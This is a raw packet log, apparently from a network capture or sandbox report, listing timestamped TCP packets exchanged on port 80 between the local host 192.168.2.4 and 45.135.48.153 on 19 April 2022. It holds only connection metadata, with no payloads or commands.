Apr 19, 2022 16:44:43.283674955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.283746958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.283788919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.283801079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.283934116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.283976078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.284032106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.284173012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.284214020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.284228086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.284384012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.284426928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.284497976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.284866095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.284907103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.284921885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.285345078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.285383940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.285437107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.285797119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.285837889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.285861969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.286062956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.286103010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.286127090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.286266088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.286307096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.286319017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.286555052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.286600113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.286624908 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.286739111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.286792994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.286818981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.286897898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.286940098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.286957979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.287030935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.287098885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.287177086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.287293911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.287503004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.287549973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.287556887 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.287611961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.287693024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.287823915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.287869930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.287925005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.288146019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.288187027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.288247108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.288363934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.288415909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.288474083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.288479090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.288528919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.288562059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.288777113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.288819075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.288880110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.288988113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.289028883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.289081097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.289187908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.289228916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.289283037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.289416075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.289457083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.289470911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.289659977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.289700985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.289712906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.289969921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.290011883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.290052891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.290074110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.290107012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.290123940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.290374994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.290414095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.290433884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.290545940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.290601969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.291062117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.291104078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.291181087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.291543007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.291587114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.291650057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.292018890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.292061090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.292373896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.292397022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.292437077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.292467117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.292506933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.292531013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.292587996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.292757034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.292782068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.292838097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.292982101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.293004990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.293497086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.834784031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.132772923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.132834911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.132875919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.132916927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.133019924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.133019924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.133061886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.133075953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.133124113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.133243084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.133284092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.133397102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.133454084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.133586884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.133626938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.133656979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.133721113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.133775949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.133836985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.133955002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.134290934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.134331942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.134357929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.134372950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.134386063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.134469032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.134510994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.134566069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.134598970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.134649038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.134721041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.134830952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.134967089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.135026932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.135051012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.135099888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.135170937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.135346889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.135644913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.136569023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138134003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138290882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138331890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138370991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138372898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.138403893 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.138408899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138473034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138514996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138523102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.138552904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138559103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.138600111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138673067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138711929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.138712883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138750076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138753891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.138789892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138837099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138876915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.138890982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138928890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.138931036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.138968945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139009953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139050007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139074087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139111996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139111996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139149904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139189005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139229059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139229059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139266968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139269114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139307022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139367104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139408112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139408112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139446020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139456987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139487028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139548063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139585972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139588118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139626026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139627934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139666080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139712095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139761925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139763117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139797926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139801025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139857054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139898062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139935017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.139936924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.139971972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.140054941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.140094042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.140351057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.140388966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.140393972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.140424967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.140649080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.141072989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.141115904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.141163111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.141587973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.141630888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.141639948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.142023087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.142066002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.142117977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.142318010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.142388105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.142426968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.142498016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.142759085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.142815113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.142843962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.142885923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.142889977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.143001080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.143156052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.143201113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.143209934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.143248081 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.143388033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.143435001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.143543005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.143591881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.143651962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.143754959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.143805981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.143873930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.143923998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.144016981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.144218922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.144260883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.144309998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.144418001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.144459009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.144459963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.144658089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.144699097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.144742966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.144895077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.144936085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.144937992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.145138025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.145179987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.145225048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.145330906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.145369053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.145370960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.145575047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.145616055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.145663977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.145771027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.145813942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.145816088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.145987988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.146027088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.146071911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.146253109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.146295071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.146301031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.146500111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.146541119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.146584034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.146740913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.146783113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.146785021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.146892071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.146931887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.146972895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.147140980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.147180080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.147182941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.147380114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.147420883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.147464991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.147589922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.147630930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.147644997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.147758961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.147949934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148004055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148039103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.148051977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.148171902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148212910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.148225069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148277998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.148324013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148412943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148591042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148616076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148657084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.148699999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.148725033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148921013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148947954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.148988962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.149183035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.149233103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.149400949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.149749994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.149775028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.149826050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.149908066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.149951935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.150032043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.150201082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.150224924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.150280952 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.150477886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.150502920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.150576115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.150609970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.150635004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.150660038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.150878906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.150902987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.150943995 CEST	49758	80	192.168.2.4	45.135.48.153
